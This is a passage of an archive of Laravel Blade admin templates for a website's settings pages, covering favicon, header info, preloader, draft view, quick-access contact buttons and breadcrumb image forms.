<div class="media"> @if (!empty($favicon->favicon_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/general/'.$favicon->favicon_image) }}" alt="favicon image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($favicon->favicon_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $favicon->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#faviconDestroyModal{{ $favicon->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $favicon->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('favicon.destroy_image', $favicon->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> <!-- Modal --> <div class="modal fade" id="faviconDestroyModal{{ $favicon->id }}" tabindex="-1" role="dialog" aria-labelledby="faviconDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="faviconDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('favicon.destroy', $favicon->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('favicon.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="favicon_image">{{ __('content.favicon') }} ({{ __('content.size') }} 128 x 128) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="favicon_image" class="form-control-file" id="favicon_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ������������views/admin/setting/header_info/create.blade.php����������������������������������������������������0000644�����������������00000013223�14765366573�0015762 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.header_info') }} <div class="btn-group"> <button type="button" class="btn btn-primary btn-sm dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> {{ __('content.'.$style) }} </button> <div class="dropdown-menu"> <a class="dropdown-item" href="{{ route('header-info.create', ['style' => 'style1']) }}">{{ __('content.style1') }}</a> </div> </div> </h4> @if (isset($header_info)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('header-info.update', $header_info->id) }}" method="POST"> @method('PUT') @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }}</label> <input type="text" name="email" class="form-control" id="email" value="{{ $header_info->email }}"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#headerInfoDestroyModal{{ $header_info->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="headerInfoDestroyModal{{ $header_info->id }}" tabindex="-1" role="dialog" aria-labelledby="headerInfoDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="headerInfoDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('header-info.destroy', $header_info->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('header-info.store') }}" method="POST"> @csrf @endif <input name="style" type="hidden" value="{{ $style }}"> <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }}</label> <input type="text" name="email" class="form-control" id="email"> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/preloader/create.blade.php������������������������������������������������������0000644�����������������00000013442�14765366573�0015477 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.preloader') }}</h4> @if (isset($preloader)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('preloader.update', $preloader->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable" {{ $preloader->status == 'enable' ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="disable" {{ $preloader->status == 'disable' ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#preloaderDestroyModal{{ $preloader->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="preloaderDestroyModal{{ $preloader->id }}" tabindex="-1" role="dialog" aria-labelledby="preloaderDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="preloaderDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('preloader.destroy', $preloader->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('preloader.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable">{{ __('content.enable') }}</option> <option value="disable">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/draft_view/create.blade.php�����������������������������������������������������0000644�����������������00000014130�14765366573�0015647 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.draft_view') }}</h4> @if (isset($draft)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('draft-view.update', $draft->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable" {{ $draft->status == 'enable' ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="disable" {{ $draft->status == 'disable' ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> <small class="form-text text-muted">{{ __('content.you_can_enable_or_disable_draft_sections_on_the_front_side') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#preloaderDestroyModal{{ $draft->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="preloaderDestroyModal{{ $draft->id }}" tabindex="-1" role="dialog" aria-labelledby="preloaderDestroyModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="preloaderDestroyModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('draft-view.destroy', $draft->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('draft-view.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable">{{ __('content.enable') }}</option> <option value="disable">{{ __('content.disable') }}</option> </select> <small class="form-text text-muted">{{ __('content.you_can_enable_or_disable_draft_sections_on_the_front_side') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/quick_access/create.blade.php���������������������������������������������������0000644�����������������00000072275�14765366573�0016170 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.side_buttons') }}</h4> @if (isset($side_button_widget)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('quick-access.update', $side_button_widget->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-4"> <div class="form-group"> <label for="social_media">{{ __('content.icon') }} <span class="text-red">*</span></label> <select class="form-control" name="social_media" id="social_media" required> <option value="" disabled selected>{{ __('content.select_your_option') }}</option> <option value="fab fa-facebook-f" {{ $side_button_widget->social_media === "fab fa-facebook-f" ? 'selected' : '' }}>Facebook</option> <option value="fab fa-twitter" {{ $side_button_widget->social_media === "fab fa-twitter" ? 'selected' : '' }}>Twitter</option> <option value="fab fa-google-plus-g" {{ $side_button_widget->social_media === "fab fa-google-plus-g" ? 'selected' : '' }}>Google Plus</option> <option value="fab fa-youtube" {{ $side_button_widget->social_media === "fab fa-youtube" ? 'selected' : '' }}>Youtube</option> <option value="fab fa-instagram" {{ $side_button_widget->social_media === "fab fa-instagram" ? 'selected' : '' }}>Instagram</option> <option value="fab fa-vk" {{ $side_button_widget->social_media === "fab fa-vk" ? 'selected' : '' }}>VK</option> <option value="fab fa-weibo" {{ $side_button_widget->social_media === "fab fa-weibo" ? 'selected' : '' }}>Weibo</option> <option value="fab fa-weixin" {{ $side_button_widget->social_media === "fab fa-weixin" ? 'selected' : '' }}>WeChat</option> <option value="fab fa-meetup" {{ $side_button_widget->social_media === "fab fa-meetup" ? 'selected' : '' }}>Meetup</option> <option value="fab fa-wikipedia-w" {{ $side_button_widget->social_media === "fab fa-wikipedia-w" ? 'selected' : '' }}>Wikipedia</option> <option value="fab fa-quora" {{ $side_button_widget->social_media === "fab fa-quora" ? 'selected' : '' }}>Quora</option> <option value="fab fa-pinterest" {{ $side_button_widget->social_media === "fab fa-pinterest" ? 'selected' : '' }}>Pinterest</option> <option value="fab fa-dribbble" {{ $side_button_widget->social_media === "fab fa-dribbble" ? 'selected' : '' }}>Dribbble</option> <option value="fab fa-linkedin-in" {{ $side_button_widget->social_media === "fab fa-linkedin-in" ? 'selected' : '' }}>Linkedin</option> <option value="fab fa-behance-square" {{ $side_button_widget->social_media === "fab fa-behance-square" ? 'selected' : '' }}>Behance</option> <option value="fab fa-wordpress" {{ $side_button_widget->social_media === "fab fa-wordpress" ? 'selected' : '' }}>WordPress</option> <option value="fab fa-blogger-b" {{ $side_button_widget->social_media === "fab fa-blogger-b" ? 'selected' : '' }}>Blogger</option> <option value="fab fa-whatsapp" {{ $side_button_widget->social_media === "fab fa-whatsapp" ? 'selected' : '' }}>Whatsapp</option> <option value="fab fa-telegram" {{ $side_button_widget->social_media === "fab fa-telegram" ? 'selected' : '' }}>Telegram</option> <option value="fab fa-skype" {{ $side_button_widget->social_media === "fab fa-skype" ? 'selected' : '' }}>Skype</option> <option value="fab fa-amazon" {{ $side_button_widget->social_media === "fab fa-amazon" ? 'selected' : '' }}>Amazon</option> <option value="fab fa-stack-overflow" {{ $side_button_widget->social_media === "fab fa-stack-overflow" ? 'selected' : '' }}>Stack Overflow</option> <option value="fab fa-stack-exchange" {{ $side_button_widget->social_media === "fab fa-stack-exchange" ? 'selected' : '' }}>Stack Exchange</option> <option value="fab fa-github" {{ $side_button_widget->social_media === "fab fa-github" ? 'selected' : '' }}>Github</option> <option value="fab fa-android" {{ $side_button_widget->social_media === "fab fa-android" ? 'selected' : '' }}>Android</option> <option value="fab fa-vimeo-v" {{ $side_button_widget->social_media === "fab fa-vimeo-v" ? 'selected' : '' }}>Vimeo</option> <option value="fab fa-tumblr" {{ $side_button_widget->social_media === "fab fa-tumblr" ? 'selected' : '' }}>Tumblr</option> <option value="fab fa-vine" {{ $side_button_widget->social_media === "fab fa-vine" ? 'selected' : '' }}>Vine</option> <option value="fab fa-twitch" {{ $side_button_widget->social_media === "fab fa-twitch" ? 'selected' : '' }}>Twitch</option> <option value="fab fa-flickr" {{ $side_button_widget->social_media === "fab fa-flickr" ? 'selected' : '' }}>Flickr</option> <option value="fab fa-yahoo" {{ $side_button_widget->social_media === "fab fa-yahoo" ? 'selected' : '' }}>Yahoo</option> <option value="fab fa-reddit" {{ $side_button_widget->social_media === "fab fa-reddit" ? 'selected' : '' }}>Reddit</option> <option value="fas fa-rss" {{ $side_button_widget->social_media === "fas fa-rs" ? 'selected' : '' }}>Rss</option> </select> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="link">{{ __('content.url') }}</label> <input id="link" type="text" name="link" value="{{ $side_button_widget->link }}" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable" {{ $side_button_widget->status === 'enable' ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="disable" {{ $side_button_widget->status === 'disable' ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="contact">{{ __('content.icon') }} <span class="text-red">*</span></label> <select class="form-control" name="contact" id="contact" required> <option value="" disabled selected>{{ __('content.select_your_option') }}</option> <option value="fas fa-envelope" {{ $side_button_widget->contact === "fas fa-envelope" ? 'selected' : '' }}>Email</option> <option value="fas fa-whatsapp" {{ $side_button_widget->contact === "fas fa-whatsapp" ? 'selected' : '' }}>Whatsapp</option> </select> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="email_or_whatsapp">{{ __('content.email_or_whatsapp') }}</label> <input id="email_or_whatsapp" type="text" name="email_or_whatsapp" value="{{ $side_button_widget->email_or_whatsapp }}" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status_whatsapp">{{ __('content.status') }}</label> <select class="form-control" name="status_whatsapp" id="status_whatsapp"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable" {{ $side_button_widget->status_whatsapp === 'enable' ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="disable" {{ $side_button_widget->status_whatsapp === 'disable' ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-8"> <div class="form-group"> <label for="phone">{{ __('content.phone') }}</label> <input id="phone" type="text" name="phone" value="{{ $side_button_widget->phone }}" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status_phone">{{ __('content.status') }}</label> <select class="form-control" name="status_phone" id="status_phone"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable" {{ $side_button_widget->status_phone === 'enable' ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="disable" {{ $side_button_widget->status_phone === 'disable' ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-4"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('quick-access.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-4"> <div class="form-group"> <label for="social_media">{{ __('content.icon') }} <span class="text-red">*</span></label> <select class="form-control" name="social_media" id="social_media" required> <option value="" disabled selected>{{ __('content.select_your_option') }}</option> <option value="fab fa-facebook-f">Facebook</option> <option value="fab fa-twitter">Twitter</option> <option value="fab fa-google-plus-g">Google Plus</option> <option value="fab fa-youtube">Youtube</option> <option value="fab fa-instagram">Instagram</option> <option value="fab fa-vk">VK</option> <option value="fab fa-weibo">Weibo</option> <option value="fab fa-weixin">WeChat</option> <option value="fab fa-meetup">Meetup</option> <option value="fab fa-wikipedia-w">Wikipedia</option> <option value="fab fa-quora">Quora</option> <option value="fab fa-pinterest">Pinterest</option> <option value="fab fa-dribbble">Dribbble</option> <option value="fab fa-linkedin-in">Linkedin</option> <option value="fab fa-behance-square">Behance</option> <option value="fab fa-wordpress">WordPress</option> <option value="fab fa-blogger-b">Blogger</option> <option value="fab fa-whatsapp">Whatsapp</option> <option value="fab fa-telegram">Telegram</option> <option value="fab fa-skype">Skype</option> <option value="fab fa-amazon">Amazon</option> <option value="fab fa-stack-overflow">Stack Overflow</option> <option value="fab fa-stack-exchange">Stack Exchange</option> <option value="fab fa-github">Github</option> <option value="fab fa-android">Android</option> <option value="fab fa-vimeo-v">Vimeo</option> <option value="fab fa-tumblr">Tumblr</option> <option value="fab fa-vine">Vine</option> <option value="fab fa-twitch">Twitch</option> <option value="fab fa-flickr">Flickr</option> <option value="fab fa-yahoo">Yahoo</option> <option value="fab fa-reddit">Reddit</option> <option value="fas fa-rss">Rss</option> </select> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="link">{{ __('content.url') }} <span class="text-red">*</span></label> <input type="text" name="link" class="form-control" id="link" required> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable">{{ __('content.enable') }}</option> <option value="disable">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="contact">{{ __('content.icon') }} <span class="text-red">*</span></label> <select class="form-control" name="contact" id="contact" required> <option value="" disabled selected>{{ __('content.select_your_option') }}</option> <option value="fas fa-envelope">Email</option> <option value="fas fa-whatsapp">Whatsapp</option> </select> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="email_or_whatsapp">{{ __('content.email_or_whatsapp') }} <span class="text-red">*</span></label> <input type="text" name="email_or_whatsapp" class="form-control" id="email_or_whatsapp" required> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status_whatsapp">{{ __('content.status') }}</label> <select name="status_whatsapp" class="form-control" id="status_whatsapp"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable">{{ __('content.enable') }}</option> <option value="disable">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-8"> <div class="form-group"> <label for="phone">{{ __('content.phone') }}</label> <input id="phone" type="text" name="phone" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status_phone">{{ __('content.status') }}</label> <select name="status_phone" class="form-control" id="status_phone"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable">{{ __('content.enable') }}</option> <option value="disable">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.bottom_buttons') }}</h4> @if (isset($bottom_button_widget)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('quick-access-bottom.update', $bottom_button_widget->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-4"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input id="button_name" type="text" name="button_name" value="{{ $bottom_button_widget->button_name }}" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="phone">{{ __('content.phone') }}</label> <input id="phone" type="text" name="phone" value="{{ $bottom_button_widget->phone }}" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status">{{ __('content.status') }}</label> <select class="form-control" name="status" id="status"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable" {{ $bottom_button_widget->status === 'enable' ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="disable" {{ $bottom_button_widget->status === 'disable' ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="button_name_2">{{ __('content.button_name_2') }}</label> <input id="button_name_2" type="text" name="button_name_2" value="{{ $bottom_button_widget->button_name_2 }}" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="whatsapp">{{ __('content.whatsapp') }}</label> <input id="whatsapp" type="text" name="whatsapp" value="{{ $bottom_button_widget->whatsapp }}" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status_whatsapp">{{ __('content.status') }}</label> <select class="form-control" name="status_whatsapp" id="status_whatsapp"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable" {{ $bottom_button_widget->status_whatsapp === 'enable' ? 'selected' : '' }}>{{ __('content.enable') }}</option> <option value="disable" {{ $bottom_button_widget->status_whatsapp === 'disable' ? 'selected' : '' }}>{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-4"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @else @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('quick-access-bottom.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-4"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }}</label> <input id="button_name" type="text" name="button_name" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="phone">{{ __('content.phone') }} </label> <input type="text" name="phone" class="form-control" id="phone"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status">{{ __('content.status') }}</label> <select name="status" class="form-control" id="status"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable">{{ __('content.enable') }}</option> <option value="disable">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="button_name_2">{{ __('content.button_name_2') }}</label> <input id="button_name_2" type="text" name="button_name_2" class="form-control"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="whatsapp">{{ __('content.whatsapp') }}</label> <input type="text" name="whatsapp" class="form-control" id="whatsapp"> </div> </div> <div class="col-md-4"> <div class="form-group"> <label for="status_whatsapp">{{ __('content.status') }}</label> <select name="status_whatsapp" class="form-control" id="status_whatsapp"> <option value="enable" selected>{{ __('content.select_your_option') }}</option> <option value="enable">{{ __('content.enable') }}</option> <option value="disable">{{ __('content.disable') }}</option> </select> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> @endif </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/setting/breadcrumb_image/create.blade.php�����������������������������������������������0000644�����������������00000023242�14765366573�0016771 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.breadcrumb_image') }}</h4> @if (isset($breadcrumb_image)) @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('breadcrumb-image.update', $breadcrumb_image->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 1920 x 400) (.svg, .jpg, .jpeg, .png, .webp)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($breadcrumb_image->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/breadcrumb/'.$breadcrumb_image->section_image) }}" alt="logo image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($breadcrumb_image->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $breadcrumb_image->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> <a href="#" class="btn btn-primary" data-toggle="modal" data-target="#breadcrumbImageDestroyModal{{ $breadcrumb_image->id }}"> <i class="fa fa-trash"></i> {{ __('content.reset') }} </a> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $breadcrumb_image->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> 